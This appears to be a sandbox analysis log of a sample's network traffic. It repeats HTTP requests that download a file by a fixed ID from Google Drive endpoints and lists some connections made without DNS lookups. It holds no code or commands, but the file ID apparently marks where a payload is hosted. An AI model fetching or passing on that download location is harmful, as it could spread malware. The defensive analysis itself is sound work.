Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
Source: global traffic	HTTP traffic detected: GET /download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=o55khbsNkt6PTomPStzpvrkwXRlUSvDju7_5yIBjrQMwcCK1bBJY_JY2n6p0DW19wFo6mBpjlL4pm4qI2VUdtPYzmW3qu0CgYQbcRQi7nxgD1kCi3kFHUNS-1m8GO7d1qNRlj4IN1ecET1qM8I3hgI-bXGh9bjX4sJAMtNKnEnbWSlw1N3y4bnqKKpQ
